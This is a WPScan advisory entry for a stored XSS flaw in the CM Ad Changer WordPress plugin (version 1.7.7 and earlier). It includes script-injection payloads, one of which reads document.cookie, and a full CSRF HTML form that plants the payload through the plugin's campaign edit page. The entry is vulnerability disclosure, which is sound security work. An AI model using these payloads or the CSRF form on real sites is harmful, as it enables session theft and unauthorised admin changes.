CM Ad Changer <= 1.7.7 - Stored Cross-Site Scripting (XSS)



Description
An Stored Cross Site Scripting was reported by the author to CM Ad Plugins under which an unprivileged user can trigger a Stored XSS to perform malicious actions or any attacker could send a crafted link (CSRF) which can trigger the Stored XSS.
Proof of Concept
1) Go to CM Ad changers -> Campaigns

2) Create a Campaign. Enter whatever you want in Campaign settings, in the next tab "Campaign Banners", select an Image in Campaign images and in Banner Title enter this payload
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>

3) Enter Save & Payload triggers everytime you Return.

Attacker Can Make a Payload File containing the following:

<html>
 
  <body>
    <h1> Click The button below. POC By Aaditya Purani:: CM AD Changer 1.7.7 </h1>   
    <form action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}" method="POST">
      <input type="hidden" name="campaign_id" value="1" />
      <input type="hidden" name="title" value="Hacked by Aaditya" />
      <input type="hidden" name="comment" value="" />
      <input type="hidden" name="link" value="" />
      <input type="hidden" name="status" value="on" />
      <input type="hidden" name="banner_display_method" value="selected" />
      <input type="hidden" name="banner_filename[]" value="yourpicvalue.jpg" />
      <input type="hidden" name="banner_title[]" value="</script><script>confirm(/aaditya/)</script>" />
      <input type="hidden" name="banner_title_tag[]" value="" />
      <input type="hidden" name="banner_tag[]" value="" />
      <input type="hidden" name="banner_link[]" value="" />
      <input type="hidden" name="banner_weight[]" value="0" />
      <input type="hidden" name="selected_banner" value="yourpicvalue.jpg" />
      <input type="hidden" name="submit" value="Save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

This will Trigger Stored XSS at banner_title Parameter.

Affects Plugin

fixed in version 1.7.8

References

URL https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes/

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Aaditya Purani
Submitter Website https://aadityapurani.com
Submitter Twitter aaditya_purani
Views 211
Verified No
WPVDB ID 8514

Timeline

Publicly Published 2016-06-09 (over 2 years ago)
Added 2016-06-13 (over 2 years ago)
Last Updated 2016-06-13 (over 2 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.